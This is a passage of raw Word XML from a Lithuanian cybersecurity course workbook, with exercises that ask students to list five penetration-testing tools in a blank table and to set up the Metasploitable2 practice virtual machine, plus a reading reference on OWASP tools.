                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36DAE926" w14:textId="2553799B"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6234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1955028C" w14:textId="3E35EA83"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2490B5D8" w14:textId="77777777" w:rsidTr="009005B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CFF31D4" w14:textId="306D9C04" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7390BA87" w14:textId="7BAA446D"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6234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05F57ABE" w14:textId="1DF2605E"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r>
      <w:tr w:rsidR="3F56D931" w:rsidRPr="005A5C28" w14:paraId="0945FDB6" w14:textId="77777777" w:rsidTr="009005B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59B33CCA" w14:textId="0CB2DB08" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73182524" w14:textId="48FEEF8D"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6234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="424D1075" w14:textId="7DE5050A"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r>
    </w:tbl>
    <w:p w14:paraId="3760FB96" w14:textId="2218526F" w:rsidR="00F453A0" w:rsidRPr="005A5C28" w:rsidRDefault="00F453A0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F349E44" w14:textId="2E779DA6" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="42890CD5"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12</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PATEIKITE SĄRAŠĄ PENKIŲ PROGRAMINIŲ ĮRANGŲ</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">SKIRTŲ ATSPARUMO TESTAVIMUI (ANGL. </w:t>
      </w:r>
      <w:r w:rsidR="00584B5D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PENETRATION TESTING TOOLS)</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PATEIKITE</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TRUMPU</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>APRAŠU</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IR TIESIOGINE</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>S PARSISUNTIMO</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> NUORODA</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. UŽPILDYKITE LENTELĘ.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9916" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="988"/>
        <w:gridCol w:w="1984"/>
        <w:gridCol w:w="4111"/>
        <w:gridCol w:w="2833"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2BBD118C" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="988" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55ABCE73" w14:textId="091E960E" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Eil.</w:t>
            </w:r>
            <w:r w:rsidR="4A42ACEC" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1698B853" w14:textId="3EC3DA1F" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4111" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F953E1A" w14:textId="74D01A5B" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Aprašas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2833" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75927F14" w14:textId="1B091959" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Parsisiuntimo nuoroda</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="717018F1" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="988" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B73D5A6" w14:textId="7A836DAB" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A89AD81" w14:textId="4EC71C18"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4111" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41833CBA" w14:textId="0E85DCB8"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2833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="416D77E3" w14:textId="0AF186A7"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28C203E4" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="988" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="743A8B48" w14:textId="6A12E914" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31B287F0" w14:textId="3FD11B05"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4111" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F259CD0" w14:textId="1458B69C"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2833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="205A3526" w14:textId="36F1E5E3"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41DF9031" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="988" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EF990A5" w14:textId="7BE7BE47" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42455F82" w14:textId="03194EFE"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4111" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B7B4A76" w14:textId="77BF2F61"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2833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA470E1" w14:textId="26CE4F0C"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0A75A7C7" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="988" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73D4CE12" w14:textId="1F99CC9F" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="067F0BBF" w14:textId="3FC94058"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4111" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F5D79BD" w14:textId="06A879B7"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2833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4183C094" w14:textId="465D1998"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r>
      <w:tr w:rsidR="3F56D931" w:rsidRPr="005A5C28" w14:paraId="29A129C4" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="988" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="436AB58E" w14:textId="237C067F" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51921232" w14:textId="72F405EE"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4111" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20D178DF" w14:textId="62AA7EF1"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c>
          <w:tcPr>
            <w:tcW w:w="2833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08E082CD" w14:textId="3680B5C8" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EE003E4" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C16DB7E" w14:textId="04776B72" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658E4741" w14:textId="5BE926AC" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="76EBA5D5" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>McRee</w:t>
      </w:r>
      <w:r w:rsidR="001E2CAC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> R. (2011, </w:t>
      </w:r>
      <w:r w:rsidR="7B78E6ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kovo 21). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OWASP Top 10 Tools and Tactics</w:t>
      </w:r>
      <w:r w:rsidR="7B78E6ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="2E2E37C1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">InfoSec. </w:t>
      </w:r>
      <w:r w:rsidR="2F8F059B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId111">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://resources.infosecinstitute.com/topic/owasp-top-10-tools-and-tactics/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E8F6BC9" w14:textId="6666A4A7" w:rsidR="00750DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00750DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF10C7A" w14:textId="143B55F7" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="42890CD5"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13</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000E01D7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NAUDODAMIESI </w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">VIRTUALIZAVUI SKIRTA PROGRAMINE ĮRANGA </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PARSISIŲSKITE IR PALEISKITE METASPLOITABLE2 VIRTUALIĄ APLINKĄ. PATEIKITE OPERACINĖS SISTEMOS DARBALAUKIO EKRANO VAIZDĄ.</w:t>
      </w:r>
    </w:p>
